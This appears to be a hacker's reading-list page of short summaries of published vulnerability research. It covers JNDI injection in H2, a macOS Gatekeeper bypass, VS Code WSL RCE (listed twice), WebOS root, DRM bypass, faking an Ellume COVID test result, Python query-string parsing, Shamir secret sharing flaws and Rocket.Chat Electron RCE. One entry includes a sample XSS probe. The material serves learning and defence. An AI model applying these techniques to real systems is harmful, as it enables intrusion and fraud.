Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console- 731

Andrey Polkovnychenko & Shachar Menashe - JFrog    Reference →Posted 4 Years Ago
  • Log4Shell was a vulnerability in the Log4J library in Java. By simply adding a special format string to the logging output, the Java Naming and Directory Interface (JNDI) queries. This interface is quite powerful and can lead to remote code execution when it reaches out for a remote Java class to execute. JDNI injection is a bug class in itself that has been seen before.
  • Since the Log4Shell vulnerability, the authors of this post decided to look into other similar vulnerabilities. They started scanning open source repository for JNDI injection vulnerabilities by searching for the dangerous sink javax.naming.Context.lookup. They found a very similar bug: several code paths path unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function.
  • As a result, a JDBC URL can be specified by the attacker. Once this is executed, a Java class can be returned, which will be executed, leading to code execution. They found this vulnerability in several places within the H2 database engine.
  • In the H2 web based console, upon attempting to login, there are two fields that are interesting: Driver Class and JDBC URL. By specifying a malicious class to be loaded pre-auth code execution (almost by design) within the application. By default, only default connections for this are allowed and the console should run only on localhost.
  • While looking through the SQL handling, they also noticed that the LINK_SCHEMA stored procedure passes driver and URL arguments directly into a vulnerable function. By setting this up properly, code execution can be achieved. However, this does require the ability to execute arbitrary queries on the database, which makes this unlikely to occur.
  • The fix for this is to prevent remote JNDI queries. It should only allow for local calls. To me, this seems feeble but we will see if it stands the test of time.

Where's the Interpreter!? (CVE-2021-30853)- 730

Patrick Wardle    Reference →Posted 4 Years Ago
  • File quarantine, Gatekeeper, & Notarization on MacOS are what prevent non-apple signed applications from running on a computer. In particular, this is meant to stop attacks where the application pretends to be Adobe Reader while actually stealing all of your files. Bypassing this leaves users at risk.
  • The root cause breaks down to a weird edge case in the system: a bash script without specifying the interpreter. By using a bash script with only a #! but without the interpreter, MacOS will gladly run this. But, for some reason, the missing interpreter bypasses the verification that MacOS should do with the user protections mentioned above. Why does this happen?
  • When no bash interpreter is specified (#! only) then an error message is returned when trying to call exec_shell_imgact. If this fails as a script, it will now use /bin/sh as the program to run.
  • Here's the kicker: MacOS now thinks that the MacOS binary being ran is NOT a bash script but the binary /bin/sh. Since this is a now a MacOS binary instead of a bash script, the call to exec_shell_imgact never happens. Eventually, when this gets to policy manager at syspolicyd, it decides that no security checks need to be made because it is NOT a script and is a trusted platform binary.
  • A super single bug wrapped in layers of complexity. Sometimes, fuzzing and trying random things is the way to go instead of raw code review. Good find!

RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit- 729

Parsia - EA    Reference →Posted 4 Years Ago
  • WSL (Windows Subsystem for Linux) allows for a Linux development without a virtual machine. Visual Studio Code runs in a server mode in WSL to talk to the VS Code running in Windows. While setting this up, the author got a firewall dialog box on Windows which peaked their interest. Down the rabbit hole we go!
  • VS Code is attempting to listen on 0.0.0.0, which is available publicly. After viewing what the commands were actually doing, the author noticed the word WebSocket on port 63574. From reading the scripts for booting the Web Socket server, there was no IP address being specified! To them, this indicated that this was likely done on accident.
  • The reason why Web Socket are interesting is that it is NOT bound to the Same Origin Policy in the browser. As a result, modifications and data stealing can be performed if the security of the Web Sockets is not done properly. The author links 6+ other articles about this type of attack being done before. A lot of the time, they lead to RCE!
  • To test this, they simply setup a website that attempts to connect to this address on localhost. The server did not care about the Origin of the request during the initial testing.
  • The protocol being used over Web Sockets was its own beast though. From looking at the traffic in Wireshark and the source code, they noticed DRM within the calls. Yikes! Luckily for the author, there is a pre-built extension that can be used to make the DRM calls. So, the reversing was not too necessary since the hardwork was being done by some library.
  • With understanding of the protocol, we can mimic being a VS Code client to the WSL side. Since the remote aspect has code execution BY DESIGN on the application, this leads to a complete game over. How do we actually exploit this though?
  • In the Web Socket protocol, a Node Inspector instance can be created. Since this is listening on all interfaces, all a victim has to do is visit our personal website to trigger the bug. Once, the outside application or local website connects to the server, arbitrary code can be ran on the machine. Another option is emulating the VS code client directly, but this would require a ton of reverse engineering to figure out.
  • To fix this, the obvious choices are NOT listening on 0.0.0.0 and checking the Origin of the Web Socket upgrade request. The actual fix was to verify the connection token in the request, which was not being done properly before.
  • The author had a few other things that they tried but did not work out. First, they tried injected ENV variables into the system to pop a shell, which is possible via the protocol. They attempted a command injection via the execArgv variable as well to no avail because of typescript. The URI handler was looked at to no avail as well. I appreciate the thought process for this added, even if it did not work.
  • Overall, this was a really good post on stumbling onto some functionality and going down the rabbit hole. These types of local desktop client issues are all over the place with this being a good example of that.

RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit- 728

Parsia - EA    Reference →Posted 4 Years Ago
  • WSL (Windows Subsystem for Linux) allows for a Linux development without a virtual machine. Visual Studio Code runs in a server mode in WSL to talk to the VS Code running in Windows. While setting this up, the author got a firewall dialog box on Windows which peaked their interest. Down the rabbit hole we go!
  • VS Code is attempting to listen on 0.0.0.0, which is available publicly. After viewing what the commands were actually doing, the author noticed the word WebSocket on port 63574. From reading the scripts for booting the Web Socket server, there was no IP address being specified! To them, this indicated that this was likely done on accident.
  • The reason why Web Socket are interesting is that it is NOT bound to the Same Origin Policy in the browser. As a result, modifications and data stealing can be performed if the security of the Web Sockets is not done properly. The author links 6+ other articles about this type of attack being done before. A lot of the time, they lead to RCE!
  • To test this, they simply setup a website that attempts to connect to this address on localhost. The server did not care about the Origin of the request during the initial testing.
  • The protocol being used over Web Sockets was its own beast though. From looking at the traffic in Wireshark and the source code, they noticed DRM within the calls. Yikes! Luckily for the author, there is a pre-built extension that can be used to make the DRM calls. So, the reversing was not too necessary since the hardwork was being done by some library.
  • With understanding of the protocol, we can mimic being a VS Code client to the WSL side. Since the remote aspect has code execution BY DESIGN on the application, this leads to a complete game over. How do we actually exploit this though?
  • In the Web Socket protocol, a Node Inspector instance can be created. Since this is listening on all interfaces, all a victim has to do is visit our personal website to trigger the bug. Once, the outside application or local website connects to the server, arbitrary code can be ran on the machine. Another option is emulating the VS code client directly, but this would require a ton of reverse engineering to figure out.
  • To fix this, the obvious choices are NOT listening on 0.0.0.0 and checking the Origin of the Web Socket upgrade request. The actual fix was to verify the connection token in the request, which was not being done properly before.
  • The author had a few other things that they tried but did not work out. First, they tried injected ENV variables into the system to pop a shell, which is possible via the protocol. They attempted a command injection via the execArgv variable as well to no avail because of typescript. The URI handler was looked at to no avail as well. I appreciate the thought process for this added, even if it did not work.
  • Overall, this was a really good post on stumbling onto some functionality and going down the rabbit hole. These types of local desktop client issues are all over the place with this being a good example of that.

V8 Heap pwn and /dev/memes - WebOS Root LPE- 727

David Buchanan    Reference →Posted 4 Years Ago
  • WebOS is the operating system used by LG TVs. Finding vulnerabilities in this may allow for the compromise of a TV. The LG TV includes a built in developer mode that allows users to sideload applications inside of a chroot jail SSH shell. The applications can either contain native code or be HTML/JS based.
  • V8 is a JavaScript and Web Assembly Engine used in modern browsers for Chrome. Since WebOS is heavily based upon Chrome, attacking V8 is a good vector. Long before this article was written, the author noticed the heavy usage of Snapshot Blobs. Snapshot blobs allow a previously created V8 context to be dynamically loaded to save time. So, what if we modified this upon application load?
  • It turns out that V8 assumes that the snapshots are benign! If you modify anything on the V8 heap, such as the length of some buffer, it takes this as true. Using this primitive, we can trivially compromise the WebOS renderer to escalate our privileges from the CHROOT jail.
  • The author talks some about the V8 exploitation from a CTF that the same exact vulnerability. Overall exploit strategy and RWX in JITed function. In general though, the author corrupts the snapshot to create an easy addrof() and fakeobj primitives then uses this to execute their own shellcode. To me, the interesting part was the finding of the bug in the first place.
  • With code execution in the context of the WebOS's browser engine, we are looking good. However, this user does not run as root. So, it is time for another LPE. In WebOS, the interface /dev/mem is world writable! This gives us direct access to the physical address space, which is the keys to the castle.
  • To actually exploit this, the author did a linear search for the struct cred in RAM. Once they found it, they elevated its creds to root by writing to /dev/mem directly. Another trick they had to use was to find the addresses in physical memory that we wanted by accessing the contents of iomem_resource. Using this, they could find the proper task information to access, eventually modifying the task associated with our process.
  • Overall, this is an interesting article that took a small oversight in the usage of snapshots and turned it into a privilege escalation. Good work!

Bypassing early 2000s copy protection for software preservation- 726

Paavo Huhtala     Reference →Posted 4 Years Ago
  • There was a Swedish children's video game series called Mulle Meck. This series released 5 games but most of the CDs are gone, since this was in the late 90s. Luckily, these games are preserved on archive.org.
  • There is a problem with one of the games in the series though: DRM. Mounting the disc imagine does absolutely nothing if it is attempted to be mounted. Time to break DRM with modern technology!
  • The game does not mount because of a copy protection known as SafeDisc2; this was very common for the era. This DRM is easily identified with a magic string inside of the main binary. The DRM itself is loaded via a driver, which was known to be riddled with security vulnerabilities.
  • The SafeDisc signature is within setup.exe, which boots the game. So, the author had an idea: "If SafeDisc is used on the installer, why don't we just install it ourselves?"
  • By extracting the game from the CD directly and mimicking the installation process, the game could be loaded without any DRM but comes with a weird error message: The program is not installed correctly. Please run the installer again. This required some digging.
  • The application took out Ghidra but got lost in the sauce. The executable was not just a game. It was Adobe Shockwave player (Macromedia Projector) with the game data simply added to the end of the file. Instead of going the Shockwave altering route, they decided to use another tool: Procmon.
  • Procmon logs all of the WinApi calls for the attached to application. After clicking through the tool for a while, they noticed a registry key access to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MulleHus.exe. If this was not found, then the application would crash since it thought that the game was not properly installed.
  • The final DRM was checking if specific files existed on the system running the game. If these files did not exist, then the game would not run, as it thought this was a bad installation. This was found via the Procmon tool as well.
  • Most DRM bypasses are about modifying the actual game or breaking cryptography. In this case, the DRM was simply side-stepped by adding in files and skipping the installer.

Faking A Positive COVID Test- 725

Ken Gannon - FSecure    Reference →Posted 4 Years Ago
  • COVID tests are becoming more and more popular. As in the modern world, computer technology is being added to the tests. The Ellume COVID-19 Home Test was looked at in this case.
  • The analyzer itself was a custom board and a standard Lateral Flow test, with the custom board determining if the user was COVID positive or negative. The analyzer would then inform the companion mobile app if the user was COVID positive or negative.
  • The Android application had an un-exported activity. On a rooted device, this can be interacted with. This activity appeared to be for debugging the application from the developer side. From looking at this, the author of the post looked a bunch about the bluetooth communication.
  • There were two types of messages: STATUS and MEASUREMENT_CONTROL_DATA. From further reverse engineering, they found the data in each of the packets. The MEASUREMENT_CONTROL_DATA packet had line information, test ID, checksum, crc and many other values.
  • The STATUS packet had the status of the test (positive or negative), measurement count and some other information. This was found by looking at the classes in the decompiled Android application.
  • How does somebody go about attacking this though? Currently, the US government allows for Ellume to administrator COVID tests for events. Once the test has been taken, the phone application on a users device is used to demonstrate the result of the test.
  • At this point, a malicious user could use Frida to hijack the flow of the application to return the data from the test. Once the data has been changed and the CRC rewritten, a certificate with the fake information comes out.
  • To me, this flow is fundamentally flawed. If an attacker can store this information on their phone, then what stops them from making a completely altered version of the application? Or, even their own phone app? In my opinion, the test should hook up to a test administrators phone instead of the users.
  • To fix this problem, the authors told Ellume to implement further analysis to ensure that data spoofing is not possible. Additionally, obfuscation and OS checks on the Android app should be done. However, these are not true protections: they only slow attackers down. A redesign in usage would be required to fix this.

How I found (and fixed) a vulnerability in Python- 724

Adam Goldschmidt    Reference →Posted 4 Years Ago
  • Many attack vectors focus on the difference between either the verifier and the user or many different points in the chain interpreting the same data. Recently, HTTP Smuggling and Web Cache Poisoning.
  • The author of this article was trying to find issues relating to different points interpreting data improperly at different points. They decided to focus on Flask, Bottle and Tornado, which are popular web frameworks.
  • The author noted that the URL parsing of these libraries were different. After discussing with members of the open source community, they were lead to the standard Python library calls. In particular, urlparse in Python.
  • The urlparse module treats semicolons as a separator. However, most modern proxies only treat ampersands as separators. Practically, an attacker could separate query parameters using a semicolon (;) where one server would see multiple query parameters while the other would see one less.
  • For instance, the parameters ?link=http://google.com&utm_content=1;link='>alert(1) HTTP/1.1 would see 3 query parameters: link, utm_content and link. However, modern proxies would only see link and utm_content. Neat! Cache desyncing!
  • The author created a pull request into CPython. This led to a change in Python 3.9 that the ; (semicolon) is not a separator anymore. The original W3C specification for URLs allowed semicolons as separators. However, more recent recommendations change this to only allow an ampersand as a separator.
  • Overall, fairly good article but I wish more details were given. Issues between steps like this one are not going away any time soon!

Shamir’s Secret Sharing Vulnerabilities- 723

Filipe Casal & Jim Miller - Trail of Bits    Reference →Posted 4 Years Ago
  • Threshold signature schemes are a protocol that allows a group of users to generate and control a private signing key. Using this, jointly the users can sign the data but it cannot be done individually.
  • Secret Sharing is a protocol for splitting a secret key into key shares. These shares can be combined in order to create a key. A common technique for this is Shamir Secret Sharing. The high-level idea behind Shamir’s scheme is that for n users, you want at least t of them (where t <= n) to recover the secret by combining their shares.
  • To make this work, a polynomial of p of degree t-l (t users necessary to use the secret) over a finite group. The shares are created by evaluating the polynomial at n (amount of users) at different points with one for each user. The key is that a single point does not reveal any information about the polynomial.
  • Since the secret value is encoded in the polynomial, recovering the polynomial recovers the secret.
  • Since the constant term of the polynomial is the secret value, it is essential that the x-value of the point is non-zero. Otherwise, the secret will be exposed. In many of the libraries, the implementation did not stop this from happening! So, it would be possible for the secret to get leaked to one of the share holders!
  • Many of the implementations used a unique ID value for the polynomial to choose. Additionally, when you operate over a finite group, it is modulo the order of the group. This means that even if 0 was not allowed, a wrap around could be used to access the zeroth element to find the key.
  • The second bug was a divide by 0. Many people forget that modulus is a division operation as well. Hence, the authors of the libraries forgot to check for the 0 case, leading to crashes.
  • The authors noted that these algorithms had very little implementation standards. As a result, they created ZKDocs to provide and help developers create non-standard cryptographic primitives.
  • Overall, this was an interesting attack that uses basic math to break the implementation. I particularly appreciated the modulus wrap around attack about this.

Rocket.Chat Client-side Remote Code Execution- 714

SSD    Reference →Posted 4 Years Ago
  • Rocket Chat is an open source variation of Slack; a team based messaging service with many collaboration tools built in. Rocket Chat has a desktop application built on Electron.
  • Rocket Chat has a desktop application that allows for same host navigation. This means that any link to the same host will be opened in the desktop application itself. By itself, this is not a problem. But, what if we can get something we control to be opened in Electron?
  • Rocket Chat allows users to open files to locations such as S3, GCloud and other places. By using the URI redirect that goes to an uploaded file with JavaScript, the code will be executed within the application!
  • Since the line between client-side JavaScript and desktop programming is quite blurred with Electron, this XSS gives access to the host! Using this, files, passwords or whatever the attacker wants could be stolen from the desktop application.
  • Electron apps are hard to lock down. Developers need to be careful with XSS and redirects specifically.